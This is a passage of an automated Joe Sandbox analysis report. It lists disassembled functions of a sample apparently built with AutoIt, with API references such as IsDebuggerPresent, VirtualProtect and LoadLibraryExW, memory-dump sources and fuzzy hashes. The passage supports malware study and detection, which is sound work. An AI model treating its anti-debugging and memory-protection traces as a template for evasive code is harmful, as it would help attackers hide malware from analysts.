                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4104443479-0
                                                                                                                            • Opcode ID: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
                                                                                                                            • Instruction ID: da54b46ed4f4733f80cd02f0f4e4149adead8fe919d093d99dbce339426910be
                                                                                                                            • Opcode Fuzzy Hash: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
                                                                                                                            • Instruction Fuzzy Hash: 8F31D6B160460AAFC704DF69C8D1E69F3A9FF48320B148629E559CB391EF30ED60CB90
                                                                                                                            Function 00EE47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsThemeActive.UXTHEME ref: 00EE4834
                                                                                                                              • Part of subcall function 00F0336C: __lock.LIBCMT ref: 00F03372
                                                                                                                              • Part of subcall function 00F0336C: DecodePointer.KERNEL32(00000001,?,00EE4849,00F37C74), ref: 00F0337E
                                                                                                                              • Part of subcall function 00F0336C: EncodePointer.KERNEL32(?,?,00EE4849,00F37C74), ref: 00F03389
                                                                                                                              • Part of subcall function 00EE48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EE4915
                                                                                                                              • Part of subcall function 00EE48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EE492A
                                                                                                                              • Part of subcall function 00EE3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EE3B68
                                                                                                                              • Part of subcall function 00EE3B3A: IsDebuggerPresent.KERNEL32 ref: 00EE3B7A
                                                                                                                              • Part of subcall function 00EE3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FA52F8,00FA52E0,?,?), ref: 00EE3BEB
                                                                                                                              • Part of subcall function 00EE3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00EE3C6F
                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EE4874
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1438897964-0
                                                                                                                            • Opcode ID: 7f3916448f20ee98278f699069dbd68c3eff758e3fbcb093f38101ddc6a0d8e2
                                                                                                                            • Instruction ID: 2355444fc535d1a381df12408fa646ca3a2162ac6f8dee297f2881379d8aaeff
                                                                                                                            • Opcode Fuzzy Hash: 7f3916448f20ee98278f699069dbd68c3eff758e3fbcb093f38101ddc6a0d8e2
                                                                                                                            • Instruction Fuzzy Hash: 8C1190B19083899FC700DF3AEC4594ABBE8EF8A750F10451EF444932B2DBB09548EB96
                                                                                                                            Function 00F00DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F0571C: __FF_MSGBANNER.LIBCMT ref: 00F05733
                                                                                                                              • Part of subcall function 00F0571C: __NMSG_WRITE.LIBCMT ref: 00F0573A
                                                                                                                              • Part of subcall function 00F0571C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00F00DD3,?), ref: 00F0575F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00F00DEC
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00F00E01
                                                                                                                              • Part of subcall function 00F0859B: RaiseException.KERNEL32(?,?,?,00F99E78,00000000,?,?,?,?,00F00E06,?,00F99E78,?,00000001), ref: 00F085F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3902256705-0
                                                                                                                            • Opcode ID: 8c44aad94a3496e46065025a3147dccd0752f7800f1485c4de1208193c633970
                                                                                                                            • Instruction ID: 8882f56da610e2387c601223635356d36d76494718ad6c6b32a2586532ec2744
                                                                                                                            • Opcode Fuzzy Hash: 8c44aad94a3496e46065025a3147dccd0752f7800f1485c4de1208193c633970
                                                                                                                            • Instruction Fuzzy Hash: C8F0CD3590031E66DB10FA98EC01ADF77ACDF01361F104416FD48A61C1DFB49A41F5E1
                                                                                                                            Function 00F055FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_file_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 26237723-0
                                                                                                                            • Opcode ID: 64db0f15f73397b8ac89521d576ff217640f3e27d6e7dc142dc7a4591c538bce
                                                                                                                            • Instruction ID: e9a9cd1559ac2bd4691a265d5f801f4d4f69e2d636a4fecaf608cd49fffd3b78
                                                                                                                            • Opcode Fuzzy Hash: 64db0f15f73397b8ac89521d576ff217640f3e27d6e7dc142dc7a4591c538bce
                                                                                                                            • Instruction Fuzzy Hash: A901F771C01A08EBCF12AF64CC0299F7B61AF91B61F444215F8141B1D1DBBA8A12FF91
                                                                                                                            Function 00F053A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F08B28: __getptd_noexit.LIBCMT ref: 00F08B28
                                                                                                                            • __lock_file.LIBCMT ref: 00F053EB
                                                                                                                              • Part of subcall function 00F06C11: __lock.LIBCMT ref: 00F06C34
                                                                                                                            • __fclose_nolock.LIBCMT ref: 00F053F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800547568-0
                                                                                                                            • Opcode ID: f48f0a3f6d9725d79f464e283d339054befcfdf927c81e7c44a6bea1cd3b2610
                                                                                                                            • Instruction ID: 085eeb101c88687b1893ee5d26c80ae94aa766a589707f0443c9ee02311983b0
                                                                                                                            • Opcode Fuzzy Hash: f48f0a3f6d9725d79f464e283d339054befcfdf927c81e7c44a6bea1cd3b2610
                                                                                                                            • Instruction Fuzzy Hash: B4F09671801A049ADB11BB659C027AE76A16F41BB5F258204A464AB1C1CBFC8942BF62
                                                                                                                            Function 014403E8 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0143FC58: GetFileAttributesW.KERNELBASE(?), ref: 0143FC63
                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01440517
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesCreateDirectoryFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3401506121-0
                                                                                                                            • Opcode ID: 770e766502ed02b66cd14dd4eff8910109c67dfbe528b1a34708041390655a8e
                                                                                                                            • Instruction ID: ded737f6cf2c2abc2fce56558c6318e0ce81cd864262d051aabc706d40cf548e
                                                                                                                            • Opcode Fuzzy Hash: 770e766502ed02b66cd14dd4eff8910109c67dfbe528b1a34708041390655a8e
                                                                                                                            • Instruction Fuzzy Hash: 31519631A1020D97EF14EFA4C954BEF7379EF58700F0045A9A60DE7290EB35AB45CBA5
                                                                                                                            Function 00F00C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                            • Instruction ID: 8d683d327b28034ccf8b9f8063029d1c5d65379e7434f1e7d2f55596e96dcf99
                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                            • Instruction Fuzzy Hash: B631A171A00105DBE718DF58C484A69F7A6FB59310F68C6A9E80ACB395DA31EDC1FB80
                                                                                                                            Function 00F1FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: 96baf8e559380fa93e7010f7ebba9dded5c8e6bf2b941d505f771d9d82c89c56
                                                                                                                            • Instruction ID: a0e2b41dfaf57507b0eee0aedbf48c7a0a88a99805cfcc6f1e9d271884843475
                                                                                                                            • Opcode Fuzzy Hash: 96baf8e559380fa93e7010f7ebba9dded5c8e6bf2b941d505f771d9d82c89c56
                                                                                                                            • Instruction Fuzzy Hash: EA414774604345CFDB24CF14C444B1ABBE1BF45318F1988ACE8999B362C731E849DF42
                                                                                                                            Function 00EE7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4104443479-0
                                                                                                                            • Opcode ID: 5716daa1e6f25d3fb27a077595f8f286435babd8813c4efbcbde628de5cdb40b
                                                                                                                            • Instruction ID: c0876d135ed6fb7050248c059cd544936c9d83ec5cd659b530149b748a687c60
                                                                                                                            • Opcode Fuzzy Hash: 5716daa1e6f25d3fb27a077595f8f286435babd8813c4efbcbde628de5cdb40b
                                                                                                                            • Instruction Fuzzy Hash: C9213372A08A0DEBDB148F26EC417EA7BB5FB54750F21842EE886D5090EB3080D0F791
                                                                                                                            Function 00EE784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4104443479-0
                                                                                                                            • Opcode ID: 8eeed3c29eacb2da4c04ab0fbddb058e0e878499ab03c184258d8941ed0646da
                                                                                                                            • Instruction ID: f124c49241ed7b5d64141fa80c5c762663f747c1e476fe688f31ed032409599b
                                                                                                                            • Opcode Fuzzy Hash: 8eeed3c29eacb2da4c04ab0fbddb058e0e878499ab03c184258d8941ed0646da
                                                                                                                            • Instruction Fuzzy Hash: 7D112431208259ABD718DF29C881C6AB7A8EF45324724811AF949EB390DF32EC01C794
                                                                                                                            Function 00EE4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00EE4BEF
                                                                                                                              • Part of subcall function 00F0525B: __wfsopen.LIBCMT ref: 00F05266
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FA52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EE4E0F
                                                                                                                              • Part of subcall function 00EE4B6A: FreeLibrary.KERNEL32(00000000), ref: 00EE4BA4
                                                                                                                              • Part of subcall function 00EE4C70: _memmove.LIBCMT ref: 00EE4CBA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1396898556-0
                                                                                                                            • Opcode ID: 1e43cf4b92a47083d566b450ef504329b1faa48e0279f27f0730b84fccfbe2c8
                                                                                                                            • Instruction ID: b842b509e038812562d0079799ff1b3769c9f5b3965f1439b977df35c47f27bc
                                                                                                                            • Opcode Fuzzy Hash: 1e43cf4b92a47083d566b450ef504329b1faa48e0279f27f0730b84fccfbe2c8
                                                                                                                            • Instruction Fuzzy Hash: 3A11E37160024DABCF15AF71CC16FAE77E8AF84B10F108829F541BB1D1EBB19A04AB51
                                                                                                                            Function 00F1FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: e29ec1eb4796eb4774e6d0e7777ea9f8b1fd10c8a505b9bd4f3b9662beea5b55
                                                                                                                            • Instruction ID: f283604d1f7c594e4919fbb8aa03ec8dcc14e1ba4fbb2f089c64e32fed42a41f
                                                                                                                            • Opcode Fuzzy Hash: e29ec1eb4796eb4774e6d0e7777ea9f8b1fd10c8a505b9bd4f3b9662beea5b55
                                                                                                                            • Instruction Fuzzy Hash: 54213770908345DFCB14DF54C844B1ABBE0BF88314F09886CE88A67762D731F808DB52
                                                                                                                            Function 00F04863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock_file.LIBCMT ref: 00F048A6
                                                                                                                              • Part of subcall function 00F08B28: __getptd_noexit.LIBCMT ref: 00F08B28
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2597487223-0
                                                                                                                            • Opcode ID: b5456c042817ee535153316130589001e4d05ecbd47c20ea048c70c8aa9de43d
                                                                                                                            • Instruction ID: 7c43577641022f6ad75a7e77e8900e522b95f85dc64829e7639c0e00ff96b1d2
                                                                                                                            • Opcode Fuzzy Hash: b5456c042817ee535153316130589001e4d05ecbd47c20ea048c70c8aa9de43d
                                                                                                                            • Instruction Fuzzy Hash: 66F0F4B1801604EBEF11AF648C0579E36E0AF00325F058814B910DA1C1CB7CC951FB51
                                                                                                                            Function 00EE4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(?,?,00FA52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EE4E7E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3664257935-0
                                                                                                                            • Opcode ID: 72cf914fe2642812a97480c4879355f62f8b13d2d53b6fd3fbfba354acfd8c9e
                                                                                                                            • Instruction ID: d832c802d38f3dd00c7b8a8bc95c656c2b5062471f82d32186799cbc4e033319
                                                                                                                            • Opcode Fuzzy Hash: 72cf914fe2642812a97480c4879355f62f8b13d2d53b6fd3fbfba354acfd8c9e
                                                                                                                            • Instruction Fuzzy Hash: 38F0A9B0100B45CFCB348F66E884822BBE1BF003293209A7EE1D7AA660C3729840EF00
                                                                                                                            Function 00F00791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F007B0
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LongNamePath_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2514874351-0
                                                                                                                            • Opcode ID: 9526ddf1541751b3c3a09a494eafb4efb4fd24071cc73e80a8f834e150b0a52a
                                                                                                                            • Instruction ID: b83c5e1e2e70e2083a90c249211d55564b809e865057838350b7d5da2a4dbdc1
                                                                                                                            • Opcode Fuzzy Hash: 9526ddf1541751b3c3a09a494eafb4efb4fd24071cc73e80a8f834e150b0a52a
                                                                                                                            • Instruction Fuzzy Hash: 61E0CD3690412C57C720D6599C05FEA77DDDF887A0F0441B5FD0CD7204D9649C9086D0
                                                                                                                            Function 00F48E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2638373210-0
                                                                                                                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                            • Instruction ID: 5c65952e814dccf704b6ee9910da9365ab13c38e969ceedf9027a37ef81ca803
